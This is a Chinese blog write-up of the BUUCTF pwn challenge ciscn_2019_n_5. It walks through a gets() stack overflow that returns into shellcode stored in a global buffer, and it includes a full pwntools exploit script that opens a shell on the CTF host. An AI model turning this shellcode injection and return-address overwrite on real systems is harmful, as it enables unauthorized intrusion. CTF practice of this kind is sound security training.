[BUUCTF]PWN20——ciscn_2019_n_5

最新推荐文章于 2023-06-29 21:29:55 发布
最新推荐文章于 2023-06-29 21:29:55 发布
阅读量1.1k 收藏 2
点赞数 2
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/108440424
版权

[BUUCTF]PWN20——ciscn_2019_n_5

附件

步骤:
例行检查,64位,没有开启任何保护
在这里插入图片描述
试运行一下程序,看看程序的执行情况
在这里插入图片描述
64位ida载入,找到main函数,在这里插入图片描述
逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上
在这里插入图片描述
第二次输入利用gets,没有限制长度,可以对v4造成溢出

利用过程

利用第一个输入点,往name参数里写入shellcode

context(arch='amd64',os='linux')                   #用来导入pwntools模块
shellcode=asm(shellcraft.sh())                     #利用pwntools模块自动生成shellcode
r.sendlineafter('tell me your name',shellcode)     #往name中写入shellcode

利用第二个输入点,让v4溢出到name参数地址,去执行shellcode拿到shell

payload='a'*0x28+p64(0x601080)                    #让v4溢出到name参数地址
r.sendlineafter('What do you want to say to me?',payload)

exp

from pwn import*

r=remote('node3.buuoj.cn',27785)

context(arch='amd64',os='linux')
shellcode=asm(shellcraft.sh())
r.sendlineafter('tell me your name',shellcode)

payload='a'*0x28+p64(0x601080)
r.sendlineafter('What do you want to say to me?',payload)

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 7421
2023全国大学生信息安全竞赛(ciscn)部分题解
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 752
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
buuctf pwn (17~20)
cainiao78777的博客
12-25 442
那这直接控制程序走向这个函数,但是这个函数,并不会把flag打印出来,所以要用到了write函数。小tips:如果sys对应的是system函数的plt表地址,那么payload应该为。strcpy在复制的时候,没有限制长度,所以我们只要输入的src够长,就能完成栈溢出。意思是只要一nc,就直接执行shellcode,然后getshell了。函数存在system函数,再看一眼有没有/bin/sh字符串。挨个看了每一个函数的逻辑发现getflag函数存在栈溢出。通过看这个程序的函数发现,这个题是静态编译的。
ciscn_pwn_shaokao
Hyrink的博客
05-30 136
ciscn初赛wp。
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 555
buuctf wp
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 668
[buuctf]ciscn_2019_n_5
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 366
buuctf-pwn 001-016题wp
【CTF】ciscn_2019_n_5
凉水的博客
04-22 884
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
BUUCTFPWN】ciscn_2019_n_5 shellcode
m0_55368674的博客
01-13 372
BUUCTFPWN】ciscn_2019_n_5题解
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
2020ciscn 部分二进制WP(持续更新)
qq_41252520的博客
08-22 1331
逆向 0x0 z3 从名字来看,暗示了使用z3解决这道题。分析main函数可以看出是一个42元一次方程组。 最后在比较结果。 [脚本]: from z3 import* ans=[0x4f17,0x9cf6,0x8ddb,0x8ea6,0x6929,0x9911,0x40a2,0x2f3e,0x62b6,0x4b82,0x486c,0x4002,0x52d7,0x2def,0x28dc,0x640d,0x528f,0x613b,0x4781,0x6b17,0x3237,0x2a93,0
ciscn 2022 华东北分区赛pwn duck
z1r0的博客
06-30 1023
很遗憾的是当时比赛解出此题花了很长时间(换了m1的mac 环境还没装,到了比赛前一会想起来x86_64的题目肯定会多一些,所以就拿了一个全新版win10的tp,第一次体验到了在比赛的时候下载ubuntu,装vm和pwn的环境,导致浪费了很多时间。。。。) 这个pwn是2.34下的,一开始拿到这个题目的时候吓了一跳(当时是第二次做2.34的glibc pwn),以为要像house of emma那样,分析下来之后感谢出题人高抬贵手。 一个uaf漏洞,但是是2.34下的,2.34下禁用了free_hook,
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2075
2022 CISCN 初赛pwn的完整wp
BUUCTF PWN 1-20
2h4ox1n9
12-03 349
1、test_your_nc from pwn import * io=remote("node3.buuoj.cn",27916) io.interactive() 之后ls , cat flag 白给
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 1404
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值